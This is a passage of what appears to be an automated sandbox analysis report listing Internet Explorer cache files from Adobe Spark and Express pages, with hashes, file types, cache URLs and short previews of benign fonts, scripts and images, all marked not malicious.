                                                                                                                                                                                                                                                        SHA-256:E3B0F61537E04D2EC06FF886ADDEAC2B1ECA2B5CC8951DF5DD2FE12013DE4253
                                                                                                                                                                                                                                                        SHA-512:49FCDD99B9AA69407AC32D4FC059EC6EAA4CBAB0E4EB4D0104D9AC3B0DC07867E3C2F321A9BF32DB8746971849868DE3D7F690E1C9D0A2C013247C0E59AF97E3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_1ead54a0ff6dcb617f31ace7cbdc8d1154dfbcaaa.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.<..WEBPVP8 .<......*8.8.>u:.J$."...X...in.tY.b......n..w.....?.>'Fw.}c....>.............?.|.}K...........w......`....?.....................././..`..^..?.............O.=.?3.h..|..Fy.../...N...a..~3..<..{.g...o...?Z..........G.W.H.@...X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1....X.c...\u.&1.x...S5......\u.&1....X.c...\u.&1....F.M......YzP..F.].\.......$.....\u.&1....X.c...\u.&1.sa80.j.+.-1x...>...+...(.G.J.f./...F....ndsU.%3......0..`..B..q.....0..5..t.<..H...T..N.M"n.M4...x$....u....~.-f.C...1.M.\u.&1....X.c...\u.&1..........X.N\m.!;%GR..9.>.s......1'1.%..{$E..2t.=.K(.<..8...B..q.....0..`..B........sNq..H.!q...T6(..M.Q.G..Xo
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\noscript.gz[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6887
                                                                                                                                                                                                                                                        Entropy (8bit):4.668876157824901
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:/SIxZvVJlZiK1ia87ErUiLJgMio6VLtXq+eoIk/QDasFJ+kIB+oldfWJgYb4d3M:PuYiBtXjevaQDaEIJgn
                                                                                                                                                                                                                                                        MD5:BAA266F5BD7729A2ED64E929B835083A
                                                                                                                                                                                                                                                        SHA1:6388FF647E1F0FC306C8CDA8765D90109A26DF15
                                                                                                                                                                                                                                                        SHA-256:858FDF50C5FC5B2E92A07EBC4EE0ACA98BB5518455080ADAF3F1CD62575526EF
                                                                                                                                                                                                                                                        SHA-512:E7DEF66977E5E95FD1F28F0CF680FE783F217E3A6BEE7285E0FC4855FA2632517D1B5E232A8698509B6DBE23B8FBD1B02ACA32169442308103E31373E3349ADB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/noscript.gz.css
                                                                                                                                                                                                                                                        Preview: .article,.publication-viewer,.section,.wp-swipe-panel-group{overflow:visible!important}#luca-splash{display:none}.wp-swipe-panel-group-panel{display:block!important;overflow:visible!important;visibility:visible!important;-webkit-transform:none!important;-moz-transform:none!important;-o-transform:none!important;-ms-transform:none!important;transform:none!important}.section{visibility:visible!important;position:relative!important;top:auto!important;right:auto!important;bottom:auto!important;left:auto!important;max-height:none!important;box-sizing:border-box}.title-section{height:80%!important}.title-section *{-webkit-transform:none!important;-moz-transform:none!important;-o-transform:none!important;-ms-transform:none!important;transform:none!important}.title-section .title-header{overflow:hidden}.single-column-section{height:auto!important}.single-column-section .section-background{position:static!important;width:100%;height:50vh}.section-background{z-index:0!important}.fullscreen-photo-
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otBannerSdk[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):349017
                                                                                                                                                                                                                                                        Entropy (8bit):5.31760027140353
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:z9i74sroLe3xdPsKiaDj2HKzd5oYEJFsEv8D66:ql3xdPsKiaOHKzd5bEJFpv8O6
                                                                                                                                                                                                                                                        MD5:09842127B6FE7CD7FED7BE501A5E0EE8
                                                                                                                                                                                                                                                        SHA1:41A188777AC1C69C98DD0E11F6C30C2F21E02510
                                                                                                                                                                                                                                                        SHA-256:6A13B93C05AF6EC6255B737032AA3F5D1F4823ED2D57D12C0735BD2C4ADC8EFC
                                                                                                                                                                                                                                                        SHA-512:C4B869C46015D0D85AA5CA5202836D08F7B82DD063D836066407755D02B8E985538B294CCD473370B2969BE2A750AC90CAE49507DE1B6C7CF893B722B26F4F36
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/scripttemplates/6.9.0/otBannerSdk.js
                                                                                                                                                                                                                                                        Preview: /** . * onetrust-banner-sdk. * v6.9.0. * by OneTrust LLC. * Copyright 2020 . */.!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var s=function(){return(s=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var s in t=arguments[o])Object.prototype.hasOwnProperty.call(t,s)&&(e[s]=t[s]);return e}).apply(this,arguments)};function a(r,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{s(a.next(e))}catch(e){t(e)}}function n(e){try{s(a.throw(e))}catch(e){t(e)}}function s(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}s((a=a.apply(r,i||[])).next())})}function d(o,n){var s,r,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t){retur
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\p[1].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                        MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                        SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                        SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                        SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://p.typekit.net/p.gif?s=1&k=rbi5aua&ht=tk&h=spark.adobe.com&f=171.172.173.174.175.176.5474.5475.146&a=1655249&js=1.20.0&app=typekit&e=js&_=1623433244672
                                                                                                                                                                                                                                                        Preview: GIF89a.............,..............;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\p[2].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                        MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                        SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                        SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                        SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://p.typekit.net/p.gif?s=1&k=vtg4qoo&ht=tk&h=spark.adobe.com&f=7180.7182.7184.22474.10294.10296.10302&a=1655249&js=1.20.0&app=typekit&e=js&_=1623433255375
                                                                                                                                                                                                                                                        Preview: GIF89a.............,..............;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pps7abe[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5912
                                                                                                                                                                                                                                                        Entropy (8bit):5.2044956005117
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:pbzQ2hl0RMFRioMWznrvMmMoZS6MaJ6QMbxkbMy9cRMxRqkM8c:pjl0RMFRioMWznrvMmMoZS6MaJ6QMbx9
                                                                                                                                                                                                                                                        MD5:6FEB771900764877F9ED7FCCCC9428B5
                                                                                                                                                                                                                                                        SHA1:31693DA6584BC9FAB601AFC35550AEEE6A8210C1
                                                                                                                                                                                                                                                        SHA-256:3AC4CEB0885F766CF6E170BA7191315EA1C54287BF0947095E85D1B090A1BC35
                                                                                                                                                                                                                                                        SHA-512:890E633998C812A19B63947F922815E14632328A9522AEBF5AFDA87D947684130C643EA48BF21124564F4DC17936DDC0F9F3907BA61594D197A797E5160B145E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000003b9b3f85. * - http://typekit.com/eulas/00000000000000003b9b3f86. * - http://typekit.com/eulas/00000000000000003b9b3f88. * - http://typekit.com/eulas/00000000000000003b9b3f83. * - http://typekit.com/eulas/00000000000000003b9b3f8c. * - http://typekit.com/eulas/00000000000000003b9b3f84. * adobe-clean-serif:. * - http://typekit.com/eulas/00000000000000003b9aee45. * - http://typekit.com/eulas/00000000000000003b9aee47. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2020-01-31 14:53:09 UTC"}*/..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/l?primer=388f68b35a7cbf
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\privacy.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):20245
                                                                                                                                                                                                                                                        Entropy (8bit):5.242617597669973
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:tv3gDf4hD0kswkP/TUyPydyCASyI2yWyOZyVVIKCXEYvvX6A+En:tv3mfuD0kswkP/TL68pyRFVyKQEQ6A+2
                                                                                                                                                                                                                                                        MD5:61C7F82AA19B0E75200172543A8A7FDC
                                                                                                                                                                                                                                                        SHA1:F2B3B898F62EB1CF2BEE8C53F8F565F75D1FAA57
                                                                                                                                                                                                                                                        SHA-256:EACEDC06C67370E790EDCF8169FDEDE20F126A1DA77DB990E1FA8C8BDCCC4338
                                                                                                                                                                                                                                                        SHA-512:272A7177651E6554456D19588C39823D9F3E7002E0DE8C8A5758154D684FFC5CCCC3B8E448C54B72D8E3309A40E7449B65586FDAB6A89BDF7A4B3A502946B424
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc/beagle/public/globalnav/adobe-privacy/latest/privacy.min.js
                                                                                                                                                                                                                                                        Preview: /*! privacy - v1.0.12 - 05-10-2021, 3:00:32 AM..ADOBE CONFIDENTIAL.==================.Copyright 2020 Adobe Systems Incorporated.All Rights Reserved...NOTICE: All information contained herein is, and remains.the property of Adobe Systems Incorporated and its suppliers,.if any. The intellectual and technical concepts contained.herein are proprietary to Adobe Systems Incorporated and its.suppliers and are protected by trade secret or copyright law..Dissemination of this information or reproduction of this material.is strictly forbidden unless prior written permission is obtained.from Adobe Systems Incorporated..*/..!function(){var e,t,n,o,i,s;e=function(){var e={};return e.isObject=function(e){return null!==e&&"object"==typeof e},e.isEmptyObject=function(e){var t;if(this.isObject(e))for(t in e)if(e.hasOwnProperty(t))return!1;return!0},e.isFunction=function(e){return"function"==typeof e},e.isArray=function(e){return this.isObject(e)&&e.constructor===Array},e.formatString=function(e,t){if("
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):728744
                                                                                                                                                                                                                                                        Entropy (8bit):5.3161263814024755
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:cOwl1aN0fJKNWun/vBQn/vBSn/vBfn/vBOyHtNj3n/vBzn/vBun/vBBn/vB30NFr:cOwraN0fJKNWun/vBQn/vBSn/vBfn/vb
                                                                                                                                                                                                                                                        MD5:67AAD4C89568B23C662905B8B4FD16BD
                                                                                                                                                                                                                                                        SHA1:FF989419D953DFB576C42BF7877EF1A2DB2062E9
                                                                                                                                                                                                                                                        SHA-256:468B99DD74B016C5CF578CEBFE98224CE4D27D745D40147B4C3DE328671E631C
                                                                                                                                                                                                                                                        SHA-512:087DF7A1100286EFA0F18CF8A0AC5DC89F090D7DEBDF48D4642B0A4B1098914E0679AADC68CCEEDAFED8D82C214BE17D440A322113C66432C7D8AE1BD60AF310
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.hawks.dexterlibs/hawks/clientlibs/publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd.js
                                                                                                                                                                                                                                                        Preview: webpackJsonp([1],{113:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var i=function(){function e(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(t,n,i){return n&&e(t.prototype,n),i&&e(t,i),t}}(),r=u(n(126)),a=u(n(189)),o=u(n(442));function u(e){return e&&e.__esModule?e:{default:e}}var s=function(){function e(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};!function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,e),this.element=t,this.utils=o.default,this.properties=n,this.tools=r.default}return i(e,[{key:"bindCollection",value:function(t,n){for(var i=arguments.length,r=Array(i>2?i-2:0),o=2;o<i;o++)r[o-2]=arguments[o];var u=e.getCollection(t,this.element);if(r.includes("bindLateItems")){var s=r.filter(function(e){return"bindLateItems"!==e});this.bindOn.apply(this,[t,n].concat
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\rbi5aua[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):19114
                                                                                                                                                                                                                                                        Entropy (8bit):5.570400661578598
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:KefQe2tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:NQMq1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:D464D0A61D4E34F4C431CA31D0F7E6E8
                                                                                                                                                                                                                                                        SHA1:73716727BFD77BA586E907A9FFC33FFC39CA73BF
                                                                                                                                                                                                                                                        SHA-256:29B51B31FAF8A954EC0209189E1A6491AFE94CBE50D1E16679FBA7561AD2BC5C
                                                                                                                                                                                                                                                        SHA-512:9B6FB7EBF94F0B42242A335B72B0C6A43DA7071B6AE9715FF70F96D54A4CA157D16A6F11B7D4C3573053E96DE06DD30791AB655BD55EEB5F3FB68989C3CB8B6D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * proxima-nova:. * - http://typekit.com/eulas/0000000000000000000158d3. * - http://typekit.com/eulas/0000000000000000000158d4. * - http://typekit.com/eulas/000000000000000000017709. * - http://typekit.com/eulas/0000000000000000000158d6. * - http://typekit.com/eulas/0000000000000000000158d7. * - http://typekit.com/eulas/0000000000000000000158d8. * - http://typekit.com/eulas/0000000000000000000158d9. * - http://typekit.com/eulas/00000000000000000001705b. * proxima-nova-condensed:. * - http://typekit.com/eulas/00000000000000000000ffd9. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\right-arrow[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 37 x 38, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1079
                                                                                                                                                                                                                                                        Entropy (8bit):7.680723038401599
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:CtqEIg0SpaWcz9efnRFfP/WN+j7+2VyCsYNmb:CtqEIg0S0WiyRR4K+qyvYN8
                                                                                                                                                                                                                                                        MD5:0521A80DA93DACC1CD2104B8C3828421
                                                                                                                                                                                                                                                        SHA1:D7E9EDD62115256357A5F5DC1BD373FB120F85D5
                                                                                                                                                                                                                                                        SHA-256:78DFEED82B27915E2415AD7AB405EBF2D7217F3DCF22005B13D5AF9B4C65C43C
                                                                                                                                                                                                                                                        SHA-512:4FA6B643810C033FDA5E117F123756F60B10318127A84D376709B66BA1197E5F477D3BF0AEBDC7113077EF592D5EEDCCF429D26007AA93214076820A367C833C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/right-arrow.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...%...&.....C.R.....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.05/02/13f.`.....tEXtSoftware.Adobe Fireworks CS6......IDATX...o.E........M+.!*H..8\..k...!...e.{........Eho.E.krE...Rr....Q.'..:...F..;..v."..*;.7._.&Jk.&.......F.7.*.t.RJ.*fJ.1.G%Y/@....K3..I..ZJ.........@).M..4..P.(x.w.(.7...O+....Z_i.Z)....lnn~...........s...RW.c\KMg2.w.VWW.4.....[..0..b.1.Y&..w).,......ukkk_t:.\.R..OeG).0bf.@E....... .0fJ..v.].....p. H....".f..R.a`q..fV.xK.Y.}Z....NOOo.+..jU.z..D.E......l%!.q.^|.dnJ`Kggg.8..Z...V..F......dWZ .......cH....>.V...Y.@.)...1PYY8.....H...5...a9..R.l....i...dyy...._.....4a.$..6....&.&"KKK....? .......R...'....{..._.z......u.b.2m..$7;88.e~~.k....2.B..............m...>.b..%..O...l.V......-...6.#Y*j..V...@+++......,.%.u...K.1EXK..3.j.....Y.r......(....,V............<....).....u...?.........e.....l]:....-... k...Jk..._...o.4....vt..y...3.........e....Ki.9..@vvv......<.T*O.......Y.F.c.. ......}.......'.\v..V\.0l...y....y...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\s75804779591865[1].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 2 x 2
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                        Entropy (8bit):3.0780023067505042
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CnwltxlHlrn:Xn
                                                                                                                                                                                                                                                        MD5:AD480FD0732D0F6F1A8B06359E3A42BB
                                                                                                                                                                                                                                                        SHA1:A544538683A2DFE574EEB2E358AC8FCC78289D50
                                                                                                                                                                                                                                                        SHA-256:A1ECBAED793A1F564C49C671F2DD0CE36F858534EF6D26B55783A06B884CC506
                                                                                                                                                                                                                                                        SHA-512:8717074DDF1198D27B9918132A550CB4BA343794CC3D304A793F9D78C9FF6C4929927B414141D40B6F6AD296725520F4C63EDEB660ED530267766C2AB74EE4A9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: GIF89a.............!.......,............Q.;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\scripts[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):36587
                                                                                                                                                                                                                                                        Entropy (8bit):5.031973795792918
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:U1qVZSpe137a6wbqWcqS5G399ah4qAUaww3boPONH7uh3fDntOX4jQt41gvUxUPU:UMZPjw/u/P0NHyBJa4j/b6g
                                                                                                                                                                                                                                                        MD5:B17288A1E30B569809A86C18E9BB2175
                                                                                                                                                                                                                                                        SHA1:C04F72BE58D7D8473718CBF00C7BBDF8E1321519
                                                                                                                                                                                                                                                        SHA-256:54F6DE9BE24813BE1C6F8CC2E86D7587E4E4EB6D19A17176B0AC733790145F42
                                                                                                                                                                                                                                                        SHA-512:3FEF9E8D01643A802FBDDF93A19F36B26254C393384F8B41A7DA0397826AAE2F2446D837B7A952197061FC5440CF1FC8CBF0483D601ED19BFBCA25F8F54EEAA6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * Copyright 2021 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */./* global window, navigator, document, fetch, performance, PerformanceObserver,. FontFace, sessionStorage, Image */./* eslint-disable no-console */..export function toClassName(name) {. return name && typeof name === 'string'. ? name.toLowerCase().replace(/[^0-9a-z]/gi, '-'). : '';.}..export function createTag(name, attrs) {. const el = document.createElement(n
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\spark_app_white@2x[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1518
                                                                                                                                                                                                                                                        Entropy (8bit):5.00107238377263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:2dfkATLf3+sZ1enVMeN2zQH9nMZ2x0gWXNdIjNN4iWbJ7oIa6d06+:cfkAvfOsZ1302zUj+Td1b+Iaim
                                                                                                                                                                                                                                                        MD5:A29E0C074D7C5E3F6A54CE20C5FEA0AF
                                                                                                                                                                                                                                                        SHA1:8563F7581C1939067B4AA354E78341BC46BD9E1D
                                                                                                                                                                                                                                                        SHA-256:511C77BD64C8D67BE5FC38F107B5005F32F38386A8142CE13753EDABEDD50B86
                                                                                                                                                                                                                                                        SHA-512:50DAC8A1C88FF4369B3199091AC273A4EC482C9C944A4A93DAAF5885C30B30A96469826BE11AAAA890F5393E08FD9CA809AF9E92A836DAC40CB722C13D1E0AE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/spark_app_white@2x.svg
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="66px" height="64px" viewBox="0 0 66 64" style="enable-background:new 0 0 66 64;" xml:space="preserve">.<style type="text/css">...st0{fill:none;}...st1{fill:#FFFFFF;}.</style>.<path class="st0" d="M14,62C7.4,62,2,56.6,2,50V14C2,7.4,7.4,2,14,2h38c6.6,0,12,5.4,12,12v36c0,6.6-5.4,12-12,12H14z"/>.<path class="st1" d="M52,4c5.5,0,10,4.5,10,10v36c0,5.5-4.5,10-10,10H14C8.5,60,4,55.5,4,50V14C4,8.5,8.5,4,14,4H52 M52,0H14..C6.3,0,0,6.3,0,14v36c0,7.7,6.3,14,14,14h38c7.7,0,14-6.3,14-14V14C66,6.3,59.7,0,52,0L52,0z"/>.<path class="st1" d="M15.1,42.3C14.9,42.2,15,42,15,41.8v-4.2c0-0.1,0-0.3,0.2-0.1c2,1.4,4.1,2,6.4,2c3.2,0,4.5-1.7,4.5-3.6..c0-1.7-0.9-3-3.9-4.8l-1.6-0.8c-4.5-2.5-5.9-5.1-5.9-8.5c0-4.5,3.1-8.1,9-8.1c2.6,0,4.8,0.4,5.9,1c0.2,0
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\terms[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):110120
                                                                                                                                                                                                                                                        Entropy (8bit):4.636880406496779
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:KK7WGD3IrPXnBo8y+i6Eb1BcythHKS9mxLpyATX7a1KaWve5:KQWGDGy+Pw1SyKhxlyAna19W25
                                                                                                                                                                                                                                                        MD5:DEA3D9CE4B53033BC97B82A14AA8B494
                                                                                                                                                                                                                                                        SHA1:C073F7DAD38A8A1CC74F8E43DBF4942AF82D710A
                                                                                                                                                                                                                                                        SHA-256:00E63B78181930A260BBB984DCA2A3BEC9187B982B424F7BAA59C7E7BF3445BF
                                                                                                                                                                                                                                                        SHA-512:6424FBCFD44269E079BEA7D809B945490049E2FE780F0644C014B24511105AF070956E8215BEA8F0B2B4801497AAAC80E0888FFB0F774096E0A49849A8D6B90B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/legal/terms.html
